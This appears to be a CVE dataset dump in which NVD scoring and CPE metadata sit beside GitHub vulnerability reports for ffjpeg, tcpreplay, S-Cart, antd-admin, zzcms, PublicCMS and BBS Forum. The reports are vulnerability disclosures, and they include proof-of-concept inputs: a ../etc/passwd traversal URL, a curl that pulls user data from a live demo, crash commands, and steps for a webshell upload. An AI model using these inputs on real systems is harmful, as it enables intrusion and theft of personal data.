[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:phpgurukul:dairy_farm_shop_management_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "6772CE9E-56D7-4CC7-9E1A-97E740D2D000", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "798" ]
798
https://github.com/VivekPanday12/CVE-/issues/3
[ "Exploit", "Third Party Advisory" ]
github.com
[ "VivekPanday12", "CVE-" ]
Exploit Title: Dairy Farm Shop Management System  — Use of Hard-coded Credentials in Source Code Leads to Admin Panel Access # Date: 2020–12-25 # Exploit Author: VIVEK PANDAY     # Vendor Homepage: https://phpgurukul.com/ # Software Link: https://phpgurukul.com/dairy-farm-shop-management-system-using-php-and-mysql/ # Version: 1.0 # Tested on: Windows 10 # Linkedln Contact: https://www.linkedin.com/in/vivek-panday-796768149/ # CVE:2020-36062 **[ Hardcoded Credentials:]** Hardcoded Passwords, also often referred to as Embedded Credentials, are plain text passwords or other secrets in source code. Password hardcoding refers to the practice of embedding plain text (non-encrypted) passwords and other secrets (SSH Keys, DevOps secrets, etc.) into the source code. Default, hardcoded passwords may be used across many of the same devices, applications, systems, which helps simplify set up at scale, but at the same time, poses a considerable cybersecurity risk. **[Attack Vectors]** An attacker can gain admin panel access using default credentials and do malicious activities **Proof Of Concept** 1 Download source code from https://phpgurukul.com/dairy-farm-shop-management-system-using-php-and-mysql/ 2 Now unzip it and go to the Database folder here we can see one SQL file. 3 Now open that file using Notepad and there we can see admin credentials. but the password is encrypted .from pattern I identified that this is MD5 hash. so we can easily decrypt using crackstation.net or any hash cracker tools like Hashcat, John the ripper. Mitigation:Always use a strong encryption algorithm like SHA-256 with SALT.Never use default credentials always change during installation time
CVE:2020-36062 Dairy Farm Shop Management System — Use of Hard-coded Credentials in Source Code Leads to Admin Panel Access
https://api.github.com/repos/VivekPanday12/CVE-/issues/3/comments
0
2022-01-23T14:55:24Z
2022-01-23T14:55:24Z
https://github.com/VivekPanday12/CVE-/issues/3
1,111,893,238
3
3,194
CVE-2021-45385
2022-02-11T16:15:08.793
A Null Pointer Dereference vulnerability exits in ffjpeg d5cfd49 (2021-12-06) in bmp_load(). When the size information in metadata of the bmp is out of range, it returns without assign memory buffer to `pb->pdata` and did not exit the program. So the program crashes when it tries to access the pb->data, in jfif_encode() at jfif.c:763. This is due to the incomplete patch for CVE-2020-13438.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/rockcarry/ffjpeg/issues/47" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/rockcarry/ffjpeg/pull/48" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/rockcarry/ffjpeg/issues/47" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/rockcarry/ffjpeg/pull/48" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:rockcarry:ffjpeg:2021-12-06:*:*:*:*:*:*:*", "matchCriteriaId": "A3438805-CAF0-41AE-BC2A-3A11A252D8E6", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/rockcarry/ffjpeg/issues/47
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "rockcarry", "ffjpeg" ]
This segment fault error is because in `bmp_load()`, when bmp's size is out of range, it returns without assign memory buffer to `pb->pdata` and did not exit the program. So the program crashes when it tries to access the `pb->data`, which is a invalid memory address. ## Test Environment Ubuntu 16.04, 64bit ffjpeg (master d5cfd49) ## How to trigger `$ ./ffjpeg -e $POC` ## POC FILE https://github.com/Marsman1996/pocs/blob/master/ffjpeg/poc-ffjpeg-d5cfd49-jfif_encode-SEGV?raw=true ## Details ### gdb report ``` Breakpoint 1, bmp_load (pb=0x7fffffffdae0, file=0x7fffffffe070 "./poc-ffjpeg-d5cfd49-jfif_encode-SEGV") at bmp.c:45 45 printf("bmp's width * height is out of range !\n"); (gdb) n bmp's width * height is out of range ! 46 goto done; (gdb) c Continuing. Breakpoint 2, jfif_encode (pb=0x7fffffffdae0) at jfif.c:757 757 bsrc = pb->pdata; (gdb) n 758 ydst = yuv_datbuf[0]; (gdb) p bsrc $2 = (BYTE *) 0x0 (gdb) c Continuing. Program received signal SIGSEGV, Segmentation fault. 0x0000000000520b78 in jfif_encode (pb=0x7fffffffdae0) at jfif.c:763 763 rgb_to_yuv(bsrc[2], bsrc[1], bsrc[0], ydst, udst, vdst); (gdb) bt #0 0x0000000000520b78 in jfif_encode (pb=0x7fffffffdae0) at jfif.c:763 #1 0x0000000000515e58 in main (argc=3, argv=0x7fffffffdcf8) at ffjpeg.c:30 ```
SEGV in jfif_encode() at jfif.c:763
https://api.github.com/repos/rockcarry/ffjpeg/issues/47/comments
0
2021-12-16T03:01:01Z
2021-12-16T06:59:43Z
https://github.com/rockcarry/ffjpeg/issues/47
1,081,716,774
47
3,195
CVE-2021-45386
2022-02-11T17:15:08.090
tcpreplay 4.3.4 has a Reachable Assertion in add_tree_ipv6() at tree.c
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/appneta/tcpreplay/issues/687" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://security.gentoo.org/glsa/202210-08" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/appneta/tcpreplay/issues/687" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://security.gentoo.org/glsa/202210-08" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:broadcom:tcpreplay:4.3.4:*:*:*:*:*:*:*", "matchCriteriaId": "ED1DFB55-CDDC-476C-98B4-F8E2D3F4E1E9", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "617" ]
617
https://github.com/appneta/tcpreplay/issues/687
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "appneta", "tcpreplay" ]
**Describe the bug** There are two reachable assertions in add_tree_ipv4() (tree.c:538) and add_tree_ipv6() (tree.c:561) when the user uses tcpprep to open a crafted pcap file. **To Reproduce** Steps to reproduce the behavior: 1. get the tcpreplay source code (master 0ca82e3) and build it 2. run the cmd: `$ tcpprep --auto=bridge --pcap=$POC --cachefile=/dev/null` The poc file could be downloaded in here: [POC_add_tree_ipv4](https://github.com/Marsman1996/pocs/blob/master/tcpreplay/poc-tcpreplay-0ca82e3-add_tree_ipv4-assertion?raw=true) [POC_add_tree_ipv6](https://github.com/Marsman1996/pocs/blob/master/tcpreplay/poc-tcpreplay-0ca82e3-add_tree_ipv6-assertion?raw=true) **Expected behavior** Program reports assertion failure and is terminated. **Screenshots** GDB report of POC_add_tree_ipv4 ``` Breakpoint 1, add_tree_ipv4 (ip=327679, data=<optimized out>, len=<optimized out>) at ../../code/src/tree.c:538 538 assert(ip == newnode->u.ip); (gdb) p ip $6 = 327679 (gdb) p newnode->u.ip $7 = 0 (gdb) n tcpprep: ../../code/src/tree.c:538: add_tree_ipv4: Assertion `ip == newnode->u.ip' failed. Program received signal SIGABRT, Aborted. 0x00007ffff7801438 in __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:54 54 ../sysdeps/unix/sysv/linux/raise.c: No such file or directory. (gdb) bt #0 0x00007ffff7801438 in __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:54 #1 0x00007ffff780303a in __GI_abort () at abort.c:89 #2 0x00007ffff77f9be7 in __assert_fail_base (fmt=<optimized out>, assertion=assertion@entry=0x41a3ba "ip == newnode->u.ip", file=file@entry=0x41a3a4 "../../code/src/tree.c", line=line@entry=538, function=function@entry=0x41a720 <__PRETTY_FUNCTION__.7785> "add_tree_ipv4") at assert.c:92 #3 0x00007ffff77f9c92 in __GI___assert_fail (assertion=assertion@entry=0x41a3ba "ip == newnode->u.ip", file=file@entry=0x41a3a4 "../../code/src/tree.c", line=line@entry=538, function=function@entry=0x41a720 <__PRETTY_FUNCTION__.7785> "add_tree_ipv4") at assert.c:101 #4 0x00000000004052db in add_tree_ipv4 (ip=327679, data=<optimized out>, len=<optimized out>) at ../../code/src/tree.c:538 #5 0x0000000000402f64 in process_raw_packets (pcap=0x648c10) at ../../code/src/tcpprep.c:463 #6 main (argc=<optimized out>, argv=<optimized out>) at ../../code/src/tcpprep.c:144 ``` GDB report of POC_add_tree_ipv6 ``` tcpprep: ../../code/src/tree.c:561: add_tree_ipv6: Assertion `ipv6_cmp(addr, &newnode->u.ip6) == 0' failed. Program received signal SIGABRT, Aborted. 0x00007ffff7801438 in __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:54 54 ../sysdeps/unix/sysv/linux/raise.c: No such file or directory. (gdb) bt #0 0x00007ffff7801438 in __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:54 #1 0x00007ffff780303a in __GI_abort () at abort.c:89 #2 0x00007ffff77f9be7 in __assert_fail_base (fmt=<optimized out>, assertion=assertion@entry=0x41a630 "ipv6_cmp(addr, &newnode->u.ip6) == 0", file=file@entry=0x41a3a4 "../../code/src/tree.c", line=line@entry=561, function=function@entry=0x41a6f0 <__PRETTY_FUNCTION__.7792> "add_tree_ipv6") at assert.c:92 #3 0x00007ffff77f9c92 in __GI___assert_fail (assertion=assertion@entry=0x41a630 "ipv6_cmp(addr, &newnode->u.ip6) == 0", file=file@entry=0x41a3a4 "../../code/src/tree.c", line=line@entry=561, function=function@entry=0x41a6f0 <__PRETTY_FUNCTION__.7792> "add_tree_ipv6") at assert.c:101 #4 0x0000000000405359 in add_tree_ipv6 (addr=0x7ffff7f81018, data=<optimized out>, len=<optimized out>) at ../../code/src/tree.c:561 #5 0x00000000004031fb in process_raw_packets (pcap=0x648c10) at ../../code/src/tcpprep.c:465 #6 main (argc=<optimized out>, argv=<optimized out>) at ../../code/src/tcpprep.c:144 ``` **System (please complete the following information):** - OS: Ubuntu - OS version: 16.04 - Tcpreplay Version: 4.3.4 (master 0ca82e3)
[Bug] Two reachable assertions in add_tree_ipv4() and add_tree_ipv6()
https://api.github.com/repos/appneta/tcpreplay/issues/687/comments
1
2021-12-17T07:24:34Z
2022-01-25T17:41:33Z
https://github.com/appneta/tcpreplay/issues/687
1,082,964,158
687
3,196
CVE-2021-44111
2022-02-11T18:15:10.747
A Directory Traversal vulnerability exists in S-Cart 6.7 via download in sc-admin/backup.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 2.1, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 3.9, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "NONE", "baseScore": 4.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 0.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/s-cart/s-cart/issues/102" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/s-cart/s-cart/issues/102" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:s-cart:s-cart:*:*:*:*:*:*:*:*", "matchCriteriaId": "F9EFE488-A72C-4245-BA4B-577C84851334", "versionEndExcluding": "6.7.2", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "22" ]
22
https://github.com/s-cart/s-cart/issues/102
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "s-cart", "s-cart" ]
**Describe the bug** cod in vendor/s-cart/core/src/Admin/Controllers/AdminBackupController.php ``` $download = request('download') ?? ''; if ($download) { $file = storage_path() . "/backups/" . $download; if (file_exists($file)) { $headers = array( 'Content-Type' => 'application/octet-stream', ); return response()->download($file, '', $headers); } } ``` without any filter,can Splicing the path. poc: ``` sc_admin/backup/?download=../../../../../../../../../../../../etc/passwd ``` **To Reproduce** Steps to reproduce the behavior: 1. login in as admin 2. visit the path:sc_admin/backup/?download=../../../../../../../../../../../../etc/passwd 3. the file will be downloaded **Screenshots** ![image](https://user-images.githubusercontent.com/49399952/142166993-f00c0432-2192-4201-823b-90096c4ebc56.png) **version** newest 6.7
A bug that leads to Arbitrary file download
https://api.github.com/repos/s-cart/s-cart/issues/102/comments
1
2021-11-17T08:46:35Z
2021-11-17T22:28:10Z
https://github.com/s-cart/s-cart/issues/102
1,055,860,989
102
3,197
CVE-2021-46371
2022-02-14T16:15:07.747
antd-admin 5.5.0 is affected by an incorrect access control vulnerability. Unauthorized access to some interfaces in the foreground leads to leakage of sensitive information.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/zuiidea/antd-admin/issues/1127" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/zuiidea/antd-admin/issues/1127" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:antd-admin_project:antd-admin:5.5.0:*:*:*:*:*:*:*", "matchCriteriaId": "028BBB46-0A17-431D-8E82-286B2A0D32F4", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "306" ]
306
https://github.com/zuiidea/antd-admin/issues/1127
[ "Exploit", "Third Party Advisory" ]
github.com
[ "zuiidea", "antd-admin" ]
> 1. Unauthorized access to some interfaces in the foreground leads to leakage of sensitive information > 2. Install according to the official documents ![image](https://user-images.githubusercontent.com/55682875/149249553-8f7732de-21b4-4895-a53f-cd2751405adc.png) > 2.1 Unauthorized access is found on some interfaces For example: /api/v1/users the poc is : curl -A 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36' http://192.168.0.125:7001/api/v1/users > 2.2 At this time you can see some information back, such as the user ID, name, age, phone number, address and other sensitive information. ![image](https://user-images.githubusercontent.com/55682875/149251012-1c0984a1-cd72-4ab7-bb9e-bbb7a27f141d.png) > 2.2 It can also be reproduced in the official sample site https://antd-admin.zuiidea.com/login?from= the poc is : curl -A 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36' https://antd-admin.zuiidea.com/api/v1/users ![image](https://user-images.githubusercontent.com/55682875/149251395-1fc23aac-00c1-476c-99ae-d518a7dab0df.png)
Unauthorized access to some interfaces in the foreground was found. Procedure
https://api.github.com/repos/zuiidea/antd-admin/issues/1127/comments
1
2022-01-13T01:50:22Z
2022-01-13T02:48:58Z
https://github.com/zuiidea/antd-admin/issues/1127
1,101,032,710
1,127
3,198
CVE-2021-45347
2022-02-14T19:15:07.857
An Incorrect Access Control vulnerability exists in zzcms 8.2, which lets a malicious user bypass authentication by changing the user name in the cookie to use any password.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/forget-code/zzcms/issues/2" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/forget-code/zzcms/issues/2" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:zzcms:zzcms:8.2:*:*:*:*:*:*:*", "matchCriteriaId": "BECA005C-6415-4E3A-899F-238BF3517593", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "287" ]
287
https://github.com/forget-code/zzcms/issues/2
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "forget-code", "zzcms" ]
If the user name in the cookie is changed to an existing user, any password can be used to bypass authentication ![1](https://user-images.githubusercontent.com/88693653/146115653-efddc00f-3875-4c4b-ada6-91156ecf0c18.png) ![2](https://user-images.githubusercontent.com/88693653/146115670-7a583483-db96-4be3-bc06-376db78bdfde.png)
Authentication can be bypassed by changing the user name in the cookie to use any password
https://api.github.com/repos/forget-code/zzcms/issues/2/comments
0
2021-12-15T03:07:23Z
2021-12-15T03:07:23Z
https://github.com/forget-code/zzcms/issues/2
1,080,510,893
2
3,199
CVE-2022-23389
2022-02-14T21:15:09.627
PublicCMS v4.0 was discovered to contain a remote code execution (RCE) vulnerability via the cmdarray parameter.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/sanluan/PublicCMS/issues/59" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/sanluan/PublicCMS/issues/59" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:publiccms:publiccms:4.0:*:*:*:*:*:*:*", "matchCriteriaId": "DA4CCE59-6A71-4BC4-86D4-3110B04C1082", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "78" ]
78
https://github.com/sanluan/PublicCMS/issues/59
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "sanluan", "PublicCMS" ]
# PublicCMS v4.0 Value parameter has command execution vulnerability ## Vulnerability Type : command execution ## Vulnerability Version : 4.0 ##Vulnerability location: PublicCMS-4.0.202107.c/publiccms-parent/publiccms-core/src/main/java/com/publiccms/co ntroller/admin/sys/SysSiteAdminController.java:249 ## Vulnerability Description AND recurrence: Manual audit of publiccms source code,a command execution vulnerability was discovered Vulnerable link 1: PublicCMS-4.0.202107.c/publiccms-parent/publiccms-core/src/main/java/com/publiccms/contr oller/admin/sys/SysSiteAdminController.java:211 `parameters` is the source of taint, value:<**>(`parameters`是污点来源,value:<**>) ![image](https://user-images.githubusercontent.com/28668177/143426989-07b0e2c6-ec70-4d45-972a-dc4a96b4ba8c.png) Vulnerable link 2:PublicCMS-4.0.202107.c/publiccms-parent/publiccms- core/src/main/java/com/publiccms/controller/admin/sys/SysSiteAdminController.java:223 The stain is passed from `parameters` to `cmdarray`, value:<**>(污点从`parameters`传递至`cmdarray`,value:<**>) ![image](https://user-images.githubusercontent.com/28668177/143428417-86739f9e-b3d5-4c0e-8779-1bf3b1131088.png) Vulnerable link 3:PublicCMS-4.0.202107.c/publiccms-parent/publiccms-core/src/main/java/com/publiccms/contr oller/admin/sys/SysSiteAdminController.java:249 `RCE` type risk trigger, caused by the input parameter `cmdarray`, value:<**> (`RCE`类型风险触发,由入参`cmdarray`导致,value:<**>) ![image](https://user-images.githubusercontent.com/28668177/143429437-bfff2241-1aa5-4d07-ab1a-8c5147a1a444.png)
#
https://api.github.com/repos/sanluan/PublicCMS/issues/59/comments
8
2021-11-25T10:38:25Z
2022-10-21T01:53:25Z
https://github.com/sanluan/PublicCMS/issues/59
1,063,417,246
59
3,200
CVE-2022-23390
2022-02-14T21:15:09.683
An issue in the getType function of BBS Forum v5.3 and below allows attackers to upload arbitrary files.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/diyhi/bbs/issues/51" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/diyhi/bbs/issues/51" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:diyhi:bbs_forum:*:*:*:*:*:*:*:*", "matchCriteriaId": "5D784CB4-D4A9-4DCC-AA13-4723AFE98832", "versionEndExcluding": null, "versionEndIncluding": "5.3", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "434" ]
434
https://github.com/diyhi/bbs/issues/51
[ "Exploit", "Third Party Advisory" ]
github.com
[ "diyhi", "bbs" ]
Hi,there are SEVEN high-risk vulnerabilities in the Administrator background。please fix it as soon as possible。 Five Arbitrary file upload vulnerabilities。 In HelpManageAction.java、MembershipCardManageAction.java、QuestionManageAction.java、TopicManageAction.java、ForumManageAction.java,there are fllowing insecure code。 > if(file.getContentType().equalsIgnoreCase("application/octet-stream")){ > String fileType = FileType.getType(file.getInputStream()); > for (String format :formatList) { > if(format.equalsIgnoreCase(fileType)){ > authentication = true; > break; > } > } > } And the getType funciton code is bellow。 > public static String getType(InputStream inputStream) throws IOException { > String fileHead = getFileContent(inputStream); > if (fileHead == null || fileHead.length() == 0) { > return null; > } > > fileHead = fileHead.toUpperCase(); > > for (Map.Entry<String,String> entry : type.entrySet()) { > if(fileHead.startsWith(entry.getKey())){ > return entry.getValue(); > } > } > return null; > } if Content-Type is “application/octet-stream” ,the program will go to getType function,and the function does not strictly check file suffixes。 proof of content。 Login to the administrator first,then chose the topic list and upload a file。with burpsuite ,you can change the Content-Type parameter to application/octet-stream,and change the filename to 1.jsp。 ![image](https://user-images.githubusercontent.com/17904936/138825129-6ecbe4f4-3c0d-4647-b310-f5a4849dd91e.png) you can find the webshell upload successfully。 